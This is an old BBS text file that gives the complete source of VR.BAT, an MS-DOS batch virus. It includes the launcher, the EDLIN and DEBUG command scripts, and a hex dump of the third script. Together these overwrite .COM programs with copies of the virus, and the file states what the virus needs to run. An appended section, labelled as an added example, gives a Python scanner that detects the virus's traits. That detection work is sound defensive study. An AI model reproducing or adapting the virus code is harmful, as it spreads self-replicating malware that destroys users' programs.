[2.7]

                           Batch Viruses
                           -------------


Whoever thought that viruses could be in a BATCH file? The virus which we
are about to see makes use of the MS-DOS operating system. This BATCH virus
uses the DEBUG & EDLIN programs.

Name: VR.BAT

echo = off         ( Self explanatory)
ctty nul           ( This is important. Console output is turned off)
path c:\msdos      ( May differ on other systems )
dir *.com/w>ind    ( The directory is written to "ind", name entries ONLY)

edlin ind<1        ( "Ind" is processed with EDLIN so only file names appear)
debug ind<2        ( New batch program is created with debug)
edlin name.bat<3   ( This batch goes to an executable form because of EDLIN)
ctty con           ( Console interface is again assigned)
name               ( Newly created NAME.BAT is called)


In addition to this Batch file, there are command files, here named 1, 2, 3.

Here is the first command file:
-------------------------------
Name: 1

1,4d               ( Here lines 1-4 of the "IND" file are deleted )
e                  ( Save file )

Here is the second command file:
--------------------------------
Name: 2

m100,10b,f000      (First program name is moved to the F000H address to save)

e108 ".BAT"        (Extension of file name is changed to .BAT)
m100,10b,f010      (File is saved again)
e100"DEL "         (DEL command is written to address 100H)
mf000,f00b,104     (Original file is written after this command)
e10c 2e            (Period is placed in front of extension)
e110 0d,0a         (Carriage return + line feed)
mf010,f020,11f     ( Modified file is moved to 11FH address from buffer area)
e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
e12b od,0a         (COPY command terminated with carriage return + lf)
rxc                ( The CX register is ... )
2c                 ( set to 2CH)
nname.bat          ( Name it NAME.BAT)
w                  ( Write )
q                  ( quit )


The third command file must be printed as a hex dump because it contains
2 control characters (1Ah=Control Z) and so is not entirely printable.

Hex dump of the third command file:
-----------------------------------
Name: 3

0100   31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
      1  ,  1  ?        .  .  n  y  y  y  y  y  y  y
0110   79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
      y     .  2  ,  ?  ?  r     .  .  n  n  y  y  y
0120   79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
      y  y  y  y     .  E  .  .  .  .  .  .  .  .  .


In order for this virus to work, VR.BAT should be in the root directory. This
program only affects .COM files.
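
A defender's view of the listing above, as an added example that is not part of the original text: a small Python scanner that flags batch files combining the traits VR.BAT relies on (console silenced with CTTY NUL, a *.COM listing redirected to a file, EDLIN or DEBUG driven from redirected input). The trait names, the scoring rule and the two benign sample files are assumptions constructed for illustration.

```python
import re

# Traits of the VR.BAT launcher, one case-insensitive pattern per trait
# (trait names are illustrative, not from the original text).
TRAITS = {
    "console_silenced": re.compile(r"^\s*@?ctty\s+nul\b", re.I),
    "com_listing_to_file": re.compile(r"^\s*@?dir\b[^>]*\*\.com[^>]*>\s*\S+", re.I),
    "scripted_edlin": re.compile(r"^\s*@?edlin\b[^<]*<\s*\S+", re.I),
    "scripted_debug": re.compile(r"^\s*@?debug\b[^<]*<\s*\S+", re.I),
}

def scan(batch_text):
    """Return {trait: [1-based line numbers]} for every trait that matched."""
    hits = {}
    for lineno, line in enumerate(batch_text.splitlines(), start=1):
        if re.match(r"^\s*(rem\b|::)", line, re.I):
            continue  # comment lines are never executed
        for trait, pattern in TRAITS.items():
            if pattern.search(line):
                hits.setdefault(trait, []).append(lineno)
    return hits

def verdict(batch_text):
    """Classify a batch file as 'suspicious', 'review' or 'clean'."""
    hits = scan(batch_text)
    scripted = "scripted_edlin" in hits or "scripted_debug" in hits
    # An editor fed from a script is only alarming next to the other traits.
    if scripted and ("console_silenced" in hits or "com_listing_to_file" in hits):
        return "suspicious"
    return "review" if hits else "clean"

# Launcher lines from the listing above, annotations stripped.
VR_BAT = """echo = off
ctty nul
path c:\\msdos
dir *.com/w>ind
edlin ind<1
debug ind<2
edlin name.bat<3
ctty con
name
"""

# Constructed benign batch files for comparison.
BENIGN = "@echo off\nrem debug session < notes\ndir *.com /w\ncopy a:*.txt c:\\docs\n"
PATCHER = "@echo off\ndebug game.exe < patch.scr\n"

if __name__ == "__main__":
    for name, text in (("VR.BAT", VR_BAT), ("benign", BENIGN), ("patcher", PATCHER)):
        print(name, verdict(text), scan(text))
```
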

Downloaded From P-80 International Information Systems 304-744-2253